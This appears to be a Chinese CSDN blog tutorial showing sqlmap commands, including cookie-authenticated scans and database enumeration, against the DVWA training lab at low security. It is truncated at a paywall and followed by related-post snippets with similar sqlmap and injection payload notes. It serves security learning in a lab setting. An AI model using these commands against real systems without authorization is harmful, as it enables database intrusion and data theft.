Sqlmap 注入DVWA[low]

最新推荐文章于 2025-06-15 15:14:20 发布
最新推荐文章于 2025-06-15 15:14:20 发布
阅读量1.1k 收藏 6
点赞数
CC 4.0 BY-SA版权
分类专栏: Web 渗透 文章标签: SQLmap DVWA SQL Injection CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/claysystem/article/details/89212443
本文详细介绍了如何利用Sqlmap工具对DVWA进行SQL注入攻击。首先,通过设置cookie参数绕过登录访问注入页面,然后展示了Sqlmap确认URL可注入并探测操作系统、Web服务器及数据库类型。接着,逐步演示了获取数据库名、表名、列名以及数据的过程,揭示了SQL注入的基本步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0.dvwa要登陆才能访问到带有sql注入的页面,所以我们需要带有cookie注入
参数:--cookie="you cookie"

伪命令:
sqlmap -u "http://www.sxxxx.com/1.php?id=111" --cookie="You cookie"
使用演示:
因为命令太长了,不方便看,我将参数以行间隔,真正使用的时候是不需要用行间隔的
sqlmap 
--url=
"192.168.64.129:8000/DVWA0/vulnerabilities/sqli/?id=1&Submit=#"
--cookie=
"security=low; ASPSESSIONIDCAQATSAR=FDGHDGHDGAJFFCDCAKCIHFPP;
echo=lao=True; PHPSESSID=ee4d0b24edece51d69c478a7f475f365"

回显:

通过sqlmap的回显,可以看出目标站的url是可被注入的,并且给出了操作系统Windows,Web服务器的指纹和使用的数据库指纹

1.获取目标数据库的数据库名


sqlmap参数:--dbs 

sqlmap 
--url="192.168.64.129:8000/DVWA0/vulnerabilities/sqli/?id=1&Submit=#"
--cookie="security=low;
ASPSESSIONIDCAQATSAR=FDGHDGHDGAJFFCDCAKCIHFPP;
echo=lao=True; PHPSESSID=ee4d0b24edece51d69c478a7f475f365"
--dbs

回显:

最低0.47元/天 解锁文章

200万优质内容无限畅学
DVWA-SQL注入sqlmap安装和使用
weixin_53256941的博客
07-12 1067
一.Python环境安装 链接: https://pan.baidu.com/s/1ZbR6LoKcSvqnF82UZvkesg?pwd=e79b 提取码: e79b 双击安装包进行安装配置环境变量 我的电脑,到属性点击高级系统设置 出现"系统属性",点击环境变量 在下面的"系统变量"里面到Path变量点击编辑,(没有的话点击新建)在变量值末尾,填上python安装路径 win+R+cmd打开命令窗口输入python出现此页面表示安装成功 二.Sqlmap安装 链接:https://pan.baidu.
[DVWA靶场实战]-SQL注入攻击(命令注入+SQL回显注入+sqlmap工具实现自动化注入)详细教程
weixin_60838266的博客
07-24 3231
利用Kali Linux和burpsuite对DVWA靶场的Command Injection模块和SQL Injection模块进行sql注入攻击详细教程,包括使用工具sqlmap进行自动化注入攻击。
使用sqlmap完成sql注入DVWA
dongf2019的博客
12-12 1552
------------------------------------------------------------------------------------------------------运行结果。4、在kali中启动firefox浏览器,设置代理为127.0.0.1,端口为8080,访问dvwasql injection页面,输入1,submit。显示出users表格所以数据,其中用户密码已经从MD5还原为明文。2、启动dvwa,启动后地址为192.168.88.128。
sqlmap扫描DVWA靶场(sql注入低、中、高)
最新发布
xingxin32的博客
06-15 600
二、打开kali,在网页输入搭建好dvwa主机的IP(ps:Windows系统IP查询命令ipconfig,Linux系统IP查询命令ifconfig)6.点开Repeater,并修改代码为id=1 or 1=1(意:这里根据kali版本的不同,有些需要后面加#,有些不需要)Windows电脑、下载phpstudy、搭建好dvwa靶场、里面有kali、sqlmap、burpsuite等软件。4.-D 数据库名 -T 表名 -C "字段,字段" --dump 获取表字段对应的数据。
SQLMap 注入 DVWA实战
Cobra的博客
12-16 3652
一、low级别 1、进入dvwa界面输入1,点击Submit,得到链接 http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit# 2、我们用sqlmap进行爆破 sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" 我们可以看到需要跳转到login的页面,所以,认为这里.
【渗透测试】|sqlmap工具注入-基于dvwasql injection
yangdan_jiayou的博客
03-27 1420
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
KALI LINUX2021环境下使用sqlmap进行DVWA中的sql注入(安全等级LOW
weixin_39464539的博客
06-07 1818
KALI LINUX环境下使用sqlmap进行DVWA中的sql注入(安全等级LOW)渗透环境第一步:将DVWA中安全等级调整为LOW (使用谷歌Chrome浏览器)第二步:利用网页对sql是否可以注入进行简单判断第三步:使用kali 进行注入(需要意需要加入cookie)功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个释也是必不可少的KaTe
利用sqlmapdvwa进行sql注入
ZJLE的博客
08-08 5298
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1)基于布尔的,即可以根据返回页面判断条件真假的注入。 2)基于时间的,即不能根据页面返回内容判断任何信息,用条件语句查看时
sqlmap注入dvwa
01-30
### 使用 sqlmapDVWA 进行 SQL 注入攻击测试 #### 准备工作 为了成功使用 `sqlmap` 工具对 DVWA 平台进行 SQL 注入测试,需先确保已正确安装并配置好 DVWA 和 `sqlmap`。DVWA 是一个专门为安全研究人员设计的...
如何利用sqlmap注入dvwa
03-19
嗯,用户想了解如何使用sqlmapDVWA进行SQL注入测试,特别是想要一个教程。首先,我得回想一下DVWA的设置,因为DVWA是一个练习用的漏洞环境,SQL注入的部分需要正确配置。用户可能已经安装了DVWA,但可能需要确认...
kali的sqlmap渗透dvwa失败
weixin_44966250的博客
12-21 161
kali的sql渗透win7上的dvwa失败
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
dvwasql injectionsqlmap工具注入low版)
crowsec
04-27 1918
可能要用到的参数:-u             指定URL--cookie     带cookie注入爆库:--dbs     发现所有数据库 (参数前有空格)列出数据库:--tables     列出数据库表  (参数前有空格)-D            选择数据库首先一定先把难度调为low当写1-5的时候,都会有值出来直接上工具如下:Sqlmap -u "http://127.0.0.1/dv...
Sqlmap
mumuzi2的博客
02-25 432
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
sqlmap使用(基于dvwa的靶场实验)
weixin_66669317的博客
12-07 1315
sqlmap使用
SQL实战post注入DVWA
weixin_44689834的博客
05-20 773
1.首先搭建好自己本地的DVWA,进入DVWA并登录,将安全级别调至low 2.使用burpsuite打开拦截,浏览器设置本地代理进行抓包,在sql injection页面userID输入并enter 3.没有发现数据包emmm 4.百度了一哈发现需要把localhost改为自己本地IP地址 5.改了之后重新进入DVWA将安全等级设为low,进入SQL injection页面输入1回车 6.返回burpsuite查看是否抓到了 抓取数据包成功 7.将抓取到的数据包复制为TXT文件 我命名为1.txt
关于解决kali对主机dvwa进行sql注入失败问题
qq_36836233的博客
03-08 1032
关于sqlmap的问题
sqlmap爆初中级ddvwa
qq_45487671的博客
06-06 673
实验5 SQLmap检测SQL注入漏洞 1.实验目的 (1)理解SQL(布尔、时间、报错)的原理; (2)学习手工的过程; (3)了解SQL注入的防御技术。 2.实验要求 1、检测是否存在sql注入漏洞; 2、使用工具sqlmap爆出,当前数据库、数据表、key字段的信息。 3、关键命令及结果截图。 任务一: Get方式 (可以使用Pikachu平台的SQL注入–字符型注入 ) 任务二:POST方式和Cookie方式(实验环境:DVWA设置为Medium级别,SQL Injecti
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值